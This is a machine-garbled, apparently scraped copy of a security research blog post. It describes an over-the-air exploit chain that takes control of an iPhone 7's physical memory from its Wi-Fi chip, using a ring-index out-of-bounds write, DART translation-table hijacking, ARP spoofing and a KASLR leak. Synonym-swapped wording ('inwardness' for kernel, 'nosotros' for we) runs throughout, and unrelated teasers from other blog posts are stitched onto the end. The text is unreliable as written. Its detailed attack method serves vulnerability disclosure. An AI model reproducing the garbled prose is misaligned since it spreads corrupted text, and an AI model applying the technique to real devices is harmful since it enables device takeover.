7.      //Iterating until at that topographic point are no to a greater extent than events to process
8.      while (this->getRemainingEvents(p_read_index, p_write_index)) {
9.
10.         //Calculate the side past times side insertion address based on the write index
11.         void* ring_addr = this->ring_base + this->item_size * write_index;
12.         uint32_t max_events = this->calculateRemainingWriteSpace();
13.
14          //Writing the electrical flow events to the ring
15.         uint32_t num_written = this->submit_func(..., ring_addr, max_events);
16.         if (!num_written)
17.             break; //No to a greater extent than events to process
18.
19.         //Update the write index
20.         write_index += num_written;
21.         if (write_index >= this->max_index) {
22.             write_index = 0; //Wrap around
23.
24.         //Commit the novel index to the IO-Space mapped buffer (!)
25.         *(this->write_index_ptr) = write_index;
26.     }
27.     ...
28. }
29.
30. score AppleBCMWLANPCIeSubmissionRing {
31.     ...
32.     uint32    max_index;          //The maximal band index               (off 88)
33.     uint32    item_size;          //The size of each item                (off 92)
33.     uint32_t* read_index_ptr;     //IO-Space mapped read index pointer   (off 174)
34.     uint32_t* write_index_ptr;    //IO-Space mapped write index pointer  (off 184)
35.     void*     ring_base;          //IO-Space mapped band base of operations address    (off 248)
36. }
function 0xFFFFFFF006D36D04

Alright! Looking at the higher upwards portion forthwith raises some cerise flags…

The portion appears to read values from IO-Space mapped buffers inwards several unlike locations, seemingly making no elbow grease to coordinate the read values. This variety of pattern opens the door to the possibility of race atmospheric condition induced past times the firmware.

Let’s focus on the “write index” utilised past times the function. At first, the index is fetched past times reading its value direct from the IO-Space mapped buffer (line 5). This same value is together with so used to derive the location to which the side past times side band item volition live written (line 11). Crucially, however, the value is not used inwards whatever shape or shape past times the surrounding verifications utilised past times the portion to create upwards one's heed whether the electrical flow band indices are valid (lines 8, 12).

Therefore, the verification methods must re-fetch the indices’ values, introducing a possible discrepancy betwixt the value used during verification, together with the ane used to house the side past times side item.

To exploit the higher upwards issue, an assaulter controlling the Wi-Fi chip tin DMA into the band indices inwards fellowship to innovate ane value for the band address calculation (line 5), patch rapidly switching the index to a different, valid value, for the remaining validations (lines 8, 12). If the higher upwards race is executed successfully, the next H2D item volition live submitted past times the host at an arbitrary attacker-controller offset from the ring’s base, triggering an out-of-bounds write!

Removing The Race Condition


While the higher upwards primitive is no uncertainty useful, it has ane inherent downside -- performing a information race from an external vantage dot may live a hard feat, specially considering the platform we’re executing on (an ARM Cortex R) is significantly slower than the targeted ane (a full-blown application processor).

Perhaps past times gaining a improve understanding of the primitive, nosotros tin bargain amongst these limitations. To this end, let’s take maintain a closer facial expression at the validation performed past times the submission function:

1.  uint32_t AppleBCMWLANPCIeSubmissionRing::calculateRemainingWriteSpace() {
2.
3.      uint32_t read_index, write_index;
4.      this->getIndices(&read_index, &write_index);
5.
6.      //Did the band wrap around?
7.      if (read_index > write_index)
8.          return read_index - (write_index + 1);
9.      else
10.         return this->max_index - write_index + (read_index ? 0 : -1);
11. }
12.
13. void AppleBCMWLANPCIeSubmissionRing::getIndices(uint32_t* rindex,
14.                                                 uint32_t* windex) {
15.     uint32_t read_index = *(this->read_index_ptr);
16.     uint32_t write_index = *(this->write_index_ptr);
17.     if (read_index >= 0x10000 || write_index >= 0x10000)
18.         panic(...);
19.     *rindex = read_index;
20.     *windex = write_index;
21. }
Ah-ha! Looking at the code above, nosotros tin seat yet some other fault.

When fetching the band indices, the getIndices portion attempts to validate their values to ensure that they make non overstep the allowed ranges. This is undoubtedly a goodness idea, equally it prevents corrupted values from existence utilised (which may resultant inwards retentivity corruption).

However, instead of comparison the indices against the electrical flow ring’s capacity, they are compared against a fixed maximal value: 0x10000. While this value is sure an upper saltation on the rings’ capacities, it is far from a tight saltation (in fact, most rings only take maintain several hundred items at-most).

Therefore, observing the code higher upwards nosotros make 2 immediate conclusions. First, if nosotros were to endeavour a race status whereby the band index is modified to a value larger than the fixed saltation (0x10000), nosotros run the run a jeopardy of triggering a inwardness panic should the race endeavour neglect (line 18). More importantly, however, modifying the write index to whatever value below the fixed bound (but silent higher upwards the actual ring’s bounds), volition allow us to give the validations above, resulting inwards an out-of-bounds write amongst no race-condition required.

Using the higher upwards primitive, nosotros tin target whatever H2D ring, causing the side past times side chemical element to live reliably inserted at an out-of-bounds address inside the kernel’s VAS! While the affected make is limited to the ring’s item size multiplied past times the aforementioned fixed bound, equally we’ll catch later on, that’s to a greater extent than than enough.

Triggering the Primitive


Before pressing on, it’s of import that nosotros bear witness that the scenario higher upwards is indeed feasible. After all, many components inside the inwardness mightiness utilise the modified band indices, which, inwards turn, may enforce their ain validations.

To make so, we’ll perform a curt experiment using our enquiry platform. First, we’ll pick out an H2D ring, together with fetch its corresponding object inside the kernel. Using the aforementioned object, nosotros tin together with so locate the ring’s base of operations address, allowing us to inspect its contents. Now, we’ll modify the band indices past times utilising the firmware’s DMA engine, patch concurrently monitoring the inwardness virtual address at the targeted offset for modification. If the primitive is triggered successfully, nosotros should await an item to live inserted at the target offset from the ring’s base of operations address.

However, running the higher upwards experiment results inwards a resounding failure! Every endeavour to trigger the out-of-bounds write results inwards a inwardness panic, thereby crashing the device. Inspecting the panic logs reveals the source of this crash:


It appears that when executing our attack, the firmware attempts to perform a DMA read functioning from an address beyond its IO-Space mapped ranges! Taking a instant to reverberate on this, the source of the mistake is forthwith apparent: since both the firmware together with the host portion the band indices through IO-Space, modifying the aforementioned values affects non only the host, but also the firmware’s implementation of the MSGBUF protocol.

Namely, the firmware attempts to read the ring’s contents using the corrupted indices, resulting inwards an out-of-bounds access to IO-Space, triggering the higher upwards panic.

As nosotros take maintain command over the firmware, nosotros could only seek to intercept the corresponding code paths inwards its MSGBUF implementation, thus preventing it from issuing the malformed DMA request. Unfortunately, this approach is easier said than done - the firmware’s implementation of MSGBUF is woven into many code-paths inwards both the ROM together with RAM; attempting to patch-out each portion results inwards either breakage of a unlike component, or inwards undesired side-effects.

Instead of addressing the sources of the DMA transfers, we’ll larn straight to the target -- the engine itself. Recall that each DMA engine on the firmware is accessible through an instance of a unmarried construction (dma_info). Changing the DMA engine’s backplane register pointers inside the dma_info construction would hateful that patch the calling code-paths are able to move along issuing malformed DMA requests, the requests themselves are never genuinely received past times the DMA engine, thus preventing us from triggering a fault.


Indeed, incorporating the higher upwards patch into our vulnerability trigger, nosotros tin at nowadays freely modify the band indices without inducing a crash. Furthermore, inspecting the corresponding inwardness virtual at the targeted index, nosotros tin catch that our overwrite is finally successful!

Devising An Exploit Plan


Having concluded that the primitive is usable, nosotros tin at nowadays proceed to the side past times side phase -- devising an exploit plan. Namely, nosotros must create upwards one's heed on a information construction to target using the exploit primitive, which may allow us to either modify the kernel’s behaviour, or otherwise gain a useful primitive bringing us closer to that goal.

So which information construction should nosotros target? As nosotros make non take maintain whatever visibility into the kernel’s address space, reliably locating structures inside the inwardness presents quite a challenge. What’s more, our primitive only allows limited command over the written content (namely, the information written past times the host is an H2D band item). On top of that, each OOB chemical element tin only live written at offsets which are multiples of the ring’s item size, thus introducing alignment constraints.

The higher upwards limitations create reliable exploitation rather difficult. Alas, if only at that topographic point were a information construction whose internal composition were relatively flexible, together with to which a unmarried modification would grant us consummate command over the host…

...But of course, we’ve already come upwards across the perfect target -- DART’s translation tables!

Recall that DART’s translation tables principle over the mapping betwixt IO-Space together with the host’s physical address space. If nosotros were able to work our primitive inwards fellowship to modify the tables, nosotros mightiness live able to innovate novel mappings into IO-Space, pointing at arbitrary physical ranges inside the host’s PAS. Mapping inwards arbitrary physical retentivity into the Wi-Fi chip is a nearly ideal primitive, equally it would allow the chip to modify whatever information construction used past times the kernel, leading to trivial code execution.

In fellowship to successfully carry out such an attack, nosotros must inaugural off figure out whether DART’s translation tables indeed constitute valid targets for the vulnerability primitive. Namely, nosotros must figure out whether they reside inside the primitive’s ambit of influence.

However, scanning through the retentivity ranges inside the primitive’s scope, nosotros rapidly come upwards to the realisation that the placement of objects next the message rings is highly variable. Indeed, each device reboot yield an alone unlike layout, thus preventing us from relying on whatever particular object existence placed at whatever given offset from a message ring.

Perhaps we’re out of luck…?

Shaping IO-Space


...Instead of relying of lucky placement of nearby objects, let’s take maintain matters into our ain hands.

In fellowship to house a DART translation tabular array inside the primitive’s scope, we’d demand to either motion a translation tabular array into the primitive’s scope, or to motion ane of the message rings, thus shifting the primitive’s ambit across unlike regions of the kernel’s memory.

The erstwhile approach seems infeasible; DART’s translation tables are only allocated when the IO-Space mappings are inaugural off populated (namely, when the Wi-Fi chip is inaugural off initialised). Once the mapping is complete, all of DART’s translation tables stay inwards their fixed positions inside the kernel’s VAS.

But what nigh moving the rings? While command rings are immovable, a 2nd laid of band exists -- “flow rings”. Flow rings are H2D rings used to facilitate the transfer of outgoing (TX) traffic. They make non carry the traffic itself, but rather notify the device of the transmitted frame’s metadata (including the IO-Space address at which its actual content is stored).

Unlike command rings, period of time rings are far to a greater extent than “flexible”. Individual flows are dynamically added together with removed equally the demand arises, past times sending a corresponding command message from the host to the device. Each period of time is identified past times its endpoints (source together with goal MAC), their encompassed protocol (i.e., EtherType), together with their “priority”.

Perhaps nosotros tin work this dynamic nature of period of time rings to our advantage. For example, if nosotros were to delete a period of time ring, it mightiness afterwards larn re-allocated at a unlike location inwards the kernel’s memory, thus shifting the ambit of our OOB primitive to a perhaps to a greater extent than “interesting” patch of objects.

Normally, deleting a period of time band is a 2 way process; the host sends a deletion request, which is afterwards met past times a corresponding message from the device, signalling a successful deletion. However, inspecting the host’s implementation of the higher upwards messages, it appears nosotros tin exactly equally good skip the inaugural off one-half of the exchange, together with send an unsolicited deletion response from the device:

1.  uint32_t AppleBCMWLANBusPCIeInterface::completeFlowRingDeleteResponseMsg(
2.                uint64_t unused, struct tx_flowring_delete_response_t* msg) {
3.   
4.      //Is the band ID inside bounds?
5.      if (msg->flow_ring_id < this->min_flow ||
6.          msg->flow_ring_id >= this->max_flow) {
7.          ...
8.      }
9.      //Does a period of time band be at the given index?
10.     else if (this->flow_rings[msg->flow_ring_id]) {
11.         this->deleteFlowCallback(msg->status, msg->flow_ring_id);
12.         ...
13.         return 0;
14.     }
15.     else {
16.         ...
17.         return 0xE00002BC;
18.     }
19. }
function 0xFFFFFFF006D2FD44

Doing so causes an interesting side-effect to occur: instead of completely deleting the ring, the host decrements a unmarried reference count on the band object, which is insufficient to convey downwards the total count to null (the missing release was meant to live performed past times the code responsible for sending the deletion asking inwards the inaugural off place).

Consequently, the period of time band is left mapped into IO-Space, but is unusable past times the host. As such, newly allocated period of time rings cannot inhabit the same IO-Space make (as it remains occupied past times the unusable ring), together with must instead live carved from higher IO-Space addresses.

This primitive has several interesting side-effects.

For starters, it allows us to re-allocate period of time rings, thus moving around their base of operations addresses inside the kernel’s VAS, recasting the cyberspace over potentially interesting objects inside the kernel.

More importantly, however, this primitive allows us to strength the allotment of a create novel DART L2 translation table. Since each L2 translation tabular array tin only map a fixed make into IO-Space, past times continuously leaking period of time rings nosotros are able to exhaust the available infinite inwards the L2 table, thereby forcing DART to allocate a novel tabular array from which the side past times side IO-Space addresses are carved.

Lastly, equally luck would take maintain it, since both the rings themselves together with DART’s translation tables are carved using the same allocator (IOMalloc), together with take maintain similar sizes, they are both carved from the same “zone” of memory. Therefore, past times continuously leaking IO-Space addresses together with creating novel period of time rings until a novel DART L2 translation tabular array is formed, nosotros tin guarantee that the novel tabular array volition live placed inwards unopen proximity to the next period of time ring, thereby placing the L2 translation tabular array inside our primitive’s scope!


Putting it all together, nosotros tin finally make a reliable placement of DART translation tables inwards unopen proximity to a period of time ring, thereby allowing us to overwrite entries inwards the translation tables amongst period of time band items.

Flow Ring Items vs. DART Descriptors


To empathise whether period of time band items create goodness candidates to overwrite DART descriptors, let’s take maintain a instant to inspect their structure. As these items are nowadays inwards the same form inwards the Android driver, nosotros are spared the demand to reverse-engineer them:

So how does the higher upwards construction relate to a DART descriptor?

As the higher upwards construction has a 64-bit aligned size, together with band items are e'er placed inwards increments of the same size, nosotros tin deduce that each quadword inwards the higher upwards construction volition reside inwards a 64-bit aligned address. Similarly, DART descriptors are 64-bits wide, together with are placed inwards 64-bit aligned addresses. Therefore, each aligned quadword inwards the higher upwards construction serves equally a potential candidate for replacing a DART descriptor.

However, going over the higher upwards quadwords, it is rapidly apparent that no fully-controlled discussion exists inside the structure. Indeed, the inaugural off together with lastly discussion are composed of generally constant values, whereas the tertiary together with quaternary contain IO-Space addresses (whose forms are incompatible amongst DART descriptors). Nonetheless, taking a closer look, it appears that the 2nd discussion is at to the lowest degree somewhat malleable. Its lower vi bytes are governed past times the goal MAC address to which the frame is existence transmitted, patch the 2 upper bytes contain the commencement of our source MAC.

Assuming nosotros could crusade the host to send frames to a MAC address of our choosing, that would grant us command over the lower vi bytes. However, the remaining 2 bytes are populated using our device’s MAC address, a much harder target for modification...

Spoofing The Source MAC?


To empathise whether nosotros tin indeed modify the device’s MAC address, let’s take maintain a closer facial expression at the mechanisms through which the MAC address may live programmable on the Wi-Fi chip.

Like many production devices, Broadcom’s Wi-Fi chips allow the storage of chip-specific configuration using ane of 2 mechanisms; either past times using a block of Serial Programmable ROM (SPROM) or past times utilising a laid of One Time Programmable (OTP) fuses. The Wi-Fi chip nowadays on the iPhone vii uses the latter mechanism.

As for the host, it stores the Wi-Fi chip’s MAC address inwards the “device tree” (among many other device-specific properties). The “device tree” is a unproblematic hierarchical representation of hardware components utilised past times the platform (much similar its Linux counterpart, bearing the same name), allowing consumers inside the inwardness to easily access (and populate) its nodes.

During the Wi-Fi chip’s initialisation, the AppleBCMWLANCore driver retrieves the contents of the chip’s OTP fuses (using the PCIe BARs), together with proceeds to parse them according to the PCMCIA Card Information Structure (CIS) format. Reverse-engineering the parsing functions inwards the kernel, it is rapidly apparent that ane tag inwards particular bears significance amongst regards to our pursuits.

If a “Function Extension” tag is encountered inwards the CIS information embedded inwards the OTP, the inwardness volition extract the MAC address encapsulated inside it, together with insert it into the “local-mac-address” node inwards the device tree, representing the Wi-Fi MAC address!


Extracting the stored OTP contents from the kernel, nosotros tin catch that no such chemical element is nowadays inwards the OTP contents to start with, thus allowing us to insert our ain tag without fright of causing a collision:

Wi-Fi Chip OTP

Therefore, to modify the MAC address, all we’d demand to make is fuse the corresponding bits into the OTP, thus inserting the novel CIS tag. However, this is easier said than done. For starters, writing to the OTP is a risky operation, together with may resultant inwards permanent harm to the chip if done incorrectly. Moreover, equally it’s call implies, writing to the OTP is a one-time operation, leaving no room for error. Perhaps nosotros could avoid changing the MAC after all?

After discussing the higher upwards situation, my colleague Ian Beer suggested an alternative!

Why not, instead, cheque if the high-order bits inwards the DART descriptor are genuinely existence used for the translation process? To seek this suggestion, we’ll work the enquiry platform to insert a valid L2 descriptor into DART, amongst ane small-scale caveat -- we’ll modify the 2 upper bytes inwards the 64-bit descriptor to “corrupted” values. After inserting the mapping, nosotros tin only insert a DMA claw into the firmware, performing a DMA access to the aforementioned address.


Running the experiment higher upwards nosotros are greeted amongst a positive result! Indeed, the upper bytes of the DART descriptor are ignored past times the translation process, thus sparing us the demand to modify the MAC.

Spoofing The Destination MAC


Having confirmed that modifying the source MAC is no longer a barrier, all that remains is to crusade the host to send a frame to a crafted MAC address, thus allowing us to command the vi significant bytes inside our 64-bit word.

Naturally, ane way to solicit a response from the host is to transmit an ICMP Echo Request (ping) to it, afterwards triggering a corresponding ICMP Echo Response to live sent inwards response. While this approach tin easily trigger the transmission of frames from the host, it only allows frames to live transmitted to known destinations, but does non offering command over the goal MAC.

To trigger communications to our target MAC, we’ll inaugural off launch an ARP Spoofing attack; sending a crafted ping from an arbitrary (unused) IP address, thereby causing the host to send an “ARP Request” querying the MAC address of the crafted IP, to which we’ll respond a response encoding our ain MAC address, thus associating the IP address amongst a crafted MAC value.

However, several problems arise when using this method. First, recall that the MAC address is meant to masquerade equally a valid DART L2 Descriptor. As we’ve seen inwards our analysis of the descriptor formats, every valid L2 descriptor must take maintain the 2 least-significant bits set. This poses somewhat of a job for MAC addresses, equally their bottom bits behave special significance:


Setting the bottom 2 bits inwards the MAC address would dot that it is a broadcast / multicast address. As nosotros are sending unicast traffic (and are expecting a unicast response), it mightiness live hard to solicit such responses from the host. Furthermore, whatever network-resident safety devices mightiness inspect the traffic together with flag it equally suspicious (especially equally nosotros are executing a classical ARP spoofing attack). What’s more, the router or access dot may decline to route unicast traffic to a broadcast MAC.

To larn around the higher upwards limitations, we’ll only inject the traffic directly from the firmware, without transmitting it over the air. To accomplish this goal, we’ve written a small-scale assembly stub that, when executed on the firmware, injects the encapsulated frames direct into the host, equally if it were transmitted over the network.

This allows us to inject fifty-fifty potentially malformed traffic that would non take maintain been routable (like unicast traffic from a broadcast MAC). Indeed, after running the ARP spoofing vector amongst the higher upwards mechanism, nosotros are able to solicit responses from the host to our crafted (broadcast) MAC address (XNU does non object to sending unicast traffic to broadcast MACs). Great!


Inception


Finally, all the ducks are lined upwards inwards a row -- nosotros tin solicit traffic to MAC addresses of our choosing (even broadcast MACs), without having to modify the source MAC. Furthermore, nosotros tin shape IO-Space inwards fellowship to strength a novel DART translation tabular array to live allocated next a period of time band inside the kernel’s VAS. Therefore, nosotros tin overwrite DART descriptors amongst our ain crafted values, thus introducing novel mappings into IO-Space. However, a unmarried inquiry remains -- which physical address should nosotros map into IO-Space?

After all, nosotros still haven’t dealt amongst the number of KASLR. As the kernel’s loading addresses, both physical together with virtual, are “slid” using a randomised value, nosotros cannot locate physical addresses inside the inwardness until nosotros uncover the slide’s value. If nosotros cannot reliably locate the kernel’s base of operations address, which physical addresses can nosotros find?

To larn around this limitation, we’ll work ane to a greater extent than trick! While the host’s physical address infinite houses the DRAM, inwards which the inwardness together with application retentivity are stored, additional regions of physically addressable content tin also live constitute inwards the PAS. For instance, hardware registers are mapped into fixed physical addresses, allowing the host to interact amongst peripherals on the SoC. Among these peripherals is DART itself!

As we’ve previously seen, DART’s translation procedure is initiated using 4 “L0 descriptors”. These descriptors are fed into DART’s hardware registers, denoting the base of operations addresses of the translation tables from which the IO-Space translation procedure begins. If nosotros were to map inwards DART’s hardware registers into IO-Space, nosotros could either read the descriptors, thus allowing us to locate DART’s translation tables inside the physical address space!

It should live noted that although DART’s hardware registers are addressable inside the host’s physical address space, it remains unknown why IO-Space mappings should fifty-fifty live allowed to include ranges beyond the DRAM’s bounds. Indeed, it stands to argue that such mappings would live prohibited past times the hardware. However, equally it happens, no such restriction is enforced - DART freely allows whatever physical make to live inserted into IO-Space.

Therefore, if nosotros wishing to map-in DART’s ain hardware registers into IO-Space, all that remains is to locate the physical ranges corresponding to DART’s hardware registers! To make so, we’ll work a combined approach.

First, we’ll work our enquiry platform to extract the DART instance, from which nosotros tin afterwards retrieve the inwardness VAS pointer corresponding to DART’s hardware registers. Then, using our translation tabular array module, nosotros tin proceed to convert the inwardness virtual address to its matching physical range. After doing so, nosotros are presented amongst the next result:


Great! The address is clearly non inside the DRAM’s range, hinting that we’re on the right track.

To verify whether this is indeed the right address, we’ll work a 2nd approach. As nosotros already noted, the device hierarchy is stored inside a construction called the “device tree”. Different properties relating to each peripheral, include the addresses of their corresponding hardware registers, are stored equally nodes inside this tree.

The device tree itself is nowadays inwards a binary format inside the firmware picture (encapsulated inwards an IMG4 container). After extracting the device tree, nosotros are presented amongst a blob storing the device hierarchy. Although the tree’s format is undocumented, inspecting the binary reveals an extremely unproblematic structure; a fixed header denoting the number of children together with entries contained inwards each node, followed past times a fixed-length name, together with a variable-length value. I later discovered that Jonathan Levin has similarly reversed this structure, together with has written a tool to parse out its contents (albeit for an IMG3 container) -- yous tin cheque out his script here.

Regardless, after writing our ain python script to parse the device tree, nosotros are presented amongst the next result:


Ah-ha! We ane time once to a greater extent than uncovering the same physical address, thus terminal that our analysis of DART’s hardware registers is correct.

Putting it all together, nosotros tin at nowadays utilise our exploit primitive to map the physical address containing DART’s registers into IO-Space. Once mapped, nosotros tin proceed to read the hardware registers’ values, including the L0 descriptors. It should live noted that attempting to access the hardware registers from the host requires strict 32-bit charge together with shop operations -- attempting a 64-bit charge from the hardware registers results inwards a garbled value existence returned. Curiously, however, DMA-ing to together with from the hardware registers from the Wi-Fi chip goes unhindered!



Using the L0 descriptor, nosotros tin at nowadays extract the physical address of the side past times side translation tabular array inwards DART’s hierarchy. Then, past times repeating the exploit primitive together with mapping-in the newly discovered physical address into IO-Space, nosotros tin repeat the process, descending downwards DART’s translation hierarchy until nosotros make a DART L2 translation table. Thus, using ane period of time ring, nosotros tin convey them all, together with inwards IO-Space bind them.

Once an L2 translation tabular array is located inside the physical address space, nosotros tin proceed to map it into IO-Space using our exploit primitive ane lastly time, thus inserting DART’s ain translation tabular array into IO-Space!

By mapping DART’s translation tabular array into its ain IO-Space ranges, nosotros tin at nowadays utilise DMA access from the Wi-Fi chip inwards fellowship to freely innovate novel mappings into IO-Space (removing the demand for the exploit primitive). Thus, gaining total command over the host’s physical memory!


Furthermore, equally DART’s translation entries are never cleared, nosotros are guaranteed that ane time the malicious IO-Space entries are inserted, they stay accessible to the Wi-Fi chip, until the device itself reboots. As such, the exploit procedure demand only occur ane time inwards fellowship to innovate a backdoor allowing the Wi-Fi chip to freely access the host’s physical memory.

One curiosity of complaint is that DART’s has a rather large TLB. Therefore, changes inwards IO-Space may non forthwith live reflected until the entries are evicted from the cache. Nonetheless, this is easily dealt amongst past times mapping inwards IO-Space addresses inwards a circular pattern, thus allowing stale entries to larn cleared.

Finding The KASLR Slide


At long last, nosotros take maintain consummate command over the entire physical address space, direct from the Wi-Fi chip. Consequently, nosotros tin proceed to map together with and modify whatever physical address nosotros desire, fifty-fifty those corresponding to the kernel’s information structures.

While this shape of access is sufficient inwards fellowship to subvert the kernel, there’s ane tiny snag nosotros take maintain yet to bargain with: KASLR. Since the kernel’s physical base of operations address is randomised using the KASLR slide, together with nosotros take maintain yet to deduce its value, nosotros mightiness take maintain to resort to scanning the DRAM’s physical address ranges until nosotros locate the inwardness itself.

This approach is rather inefficient. Instead, nosotros tin opt for a to a greater extent than elegant path. Recall that, equally we’ve exactly seen, hardware registers may live freely mapped into IO-Space. As hardware registers are non affected past times the KASLR slide (indeed they are mapped at fixed physical addresses), they tin live trivially located regardless of the electrical flow “slide” value.

Perhaps ane of the hardware registers tin live used equally an oracle to deduce the KASLR slide?

Recall that newer devices, such equally the iPhone 7, enforce the integrity of the inwardness using a hardware machinery dubbed “KTRR”. Simply put, this machinery allows the device to supply “lockdown” regions, to which subsequent modifications are prohibited. These regions are programmed using a special laid of hardware registers.



Amusingly, this real same machinery tin live used to deduce the KASLR slide!

By mapping inwards physical addresses corresponding to the aforementioned hardware registers, nosotros tin proceed to read their contents direct from IO-Space. This, inwards turn, reveals the physical ranges encoded inwards the “lockdown registers”, which shop non other than the kernel’s base of operations address.

The Exploit


Summing upwards all of the above, we’ve finally written an exploit, allowing total command over the device’s physical retentivity over-the-air, using Wi-Fi communication alone. You tin uncovering the exploit here.

It should live noted that several smaller details take maintain been omitted from the spider web log post, inwards the involvement of (some) brevity. For instance, locating the offset betwixt the newly allocated DART translation tabular array together with the period of time band requires a procedure of probing diverse IO-Space addresses, patch also guaranteeing that alignment constraints enforced past times the granularity of band item sizes are met. We encourage researchers to read the exploit’s code inwards fellowship to uncovering whatever such omitted parts.

The exploit has been tested against the iPhone vii running iOS 10.2 (14C92). The vulnerabilities are nowadays inwards versions of iOS upwards to (and including) iOS 10.3.3. Researchers wishing to utilise the exploit on unlike iDevices or unlike versions, would live required to suit the symbols used past times the exploit.


Upon successful execution, the exploit exposes APIs to read together with write the host’s physical retentivity direct over-the-air, past times mapping inwards whatever requested address to the controlled DART L2 translation table, together with issuing DMA accesses to the corresponding mapped IO-Space addresses.

For convenience sake, the exploit also locates the kernel’s physical base of operations address using the method nosotros described higher upwards (using the KTRR read-only part registers), thus allowing researchers to easily explore the kernel’s physical retentivity ranges.

Afterword


Over the course of study of this series of spider web log posts, we’ve explored the safety of the Wi-Fi stack on Apple devices. Consequently, nosotros constructed a consummate exploit chain, allowing attackers to reliably gain command over the iOS inwardness on an iPhone vii using Wi-Fi communication alone.

During our research, nosotros explored several components, including Broadcom’s Wi-Fi firmware, the DART IOMMU, together with Apple’s Wi-Fi drivers. Each of the aforementioned components is proprietary, thus requiring substantial elbow grease to gain visibility into their operations. We hope that past times providing the tools used to conduct our research, additional exploration of these surfaces volition live performed inwards the future, allowing for their corresponding safety postures to live enhanced.

We’ve also seen how the iPhone utilises hardware safety mechanisms, such equally DART, inwards fellowship to supply isolation betwixt the host together with potentially malicious components. These mechanisms significantly elevate the bar for launching successful attacks targeting the host. Nonetheless, additional enquiry into DART is needed inwards fellowship to explore all facets of its implementation. For instance, patch we’ve explored the enacted IO-Space through the prism of the Wi-Fi chip, additional PCIe components be on the SoC, which are similarly guarded past times DARTs. These components remain, equally of yet, unexplored.

Apart from fixing private vulnerabilities inwards the safety boundaries betwixt the host together with the Wi-Fi chip, several structural enhancements tin live applied to create hereafter exploitation harder. This includes introducing read-only mappings to DART (if they are non already present), clearing unused descriptors from DART’s translation tables upon rebooting the associated component, together with preventing IO-Space mappings from exposing physical ranges beyond the DRAM.

Lastly, patch retentivity isolation goes a long way towards defending the host against a rogue Wi-Fi chip, the host must silent consider all communications originating from the Wi-Fi chip equally potentially malicious. To this end, the numerous communication channels betwixt the 2 endpoints (including lawsuit packets, “ioctls”, together with command commands), must live designed to withstand malformed information transmitted past times the chip.

Komentar

Postingan populer dari blog ini

Exception-Oriented Exploitation On Ios

Posted past times Ian Beer, This postal service covers the regain in addition to exploitation of CVE-2017-2370 , a heap buffer overflow inwards the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the evolution of an exploitation technique which involves repeatedly in addition to deliberately crashing in addition to how to build alive meat introspection features using onetime meat exploits. It’s a trap! Alongside a large number of BSD syscalls (like ioctl, mmap, execve in addition to so on) XNU also has a pocket-sized number of extra syscalls supporting the MACH side of the meat called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap tabular array is defined: /* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll), /* xiii */ MACH_TRAP(kern_invalid, 0, 0, NULL), /* xiv */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww), Most of the mach traps a

Lifting The (Hyper) Visor: Bypassing Samsung’S Real-Time Total Protection

Posted yesteryear Gal Beniamini, Traditionally, the operating system’s total is the concluding security boundary standing betwixt an assaulter together with total command over a target system. As such, additional aid must hold upwards taken inwards lodge to ensure the integrity of the kernel. First, when a organization boots, the integrity of its primal components, including that of the operating system’s kernel, must hold upwards verified. This is achieved on Android yesteryear the verified kicking chain . However, only booting an authenticated total is insufficient—what most maintaining the integrity of the total spell the organization is executing? Imagine a scenario where an assaulter is able to abide by together with exploit a vulnerability inwards the operating system’s kernel. Using such a vulnerability, the assaulter may endeavor to subvert the integrity of the total itself, either yesteryear modifying the contents of its code, or yesteryear introducing novel attacker-co

Chrome Bone Exploit: 1 Byte Overflow As Well As Symlinks

The next article is an invitee weblog post from an external researcher (i.e. the writer is non a or Google researcher). This post is most a Chrome OS exploit I reported to Chrome VRP inward September. The folks were squeamish to allow me do a invitee post most it, therefore hither goes. The study includes a detailed writeup , therefore this post volition have got less detail. 1 byte overflow inward a DNS library In Apr I constitute a TCP port listening on localhost inward Chrome OS. It was an HTTP proxy built into shill, the Chrome OS network manager. The proxy has at nowadays been removed equally component of a fix, but its source tin give notice nonetheless move seen from an one-time revision: shill/http_proxy.cc . The code is unproblematic in addition to doesn’t seem to incorporate whatever obvious exploitable bugs, although it is real liberal inward what it accepts equally incoming HTTP. It calls into the c-ares library for resolving DNS. There was a possible 1 byte ov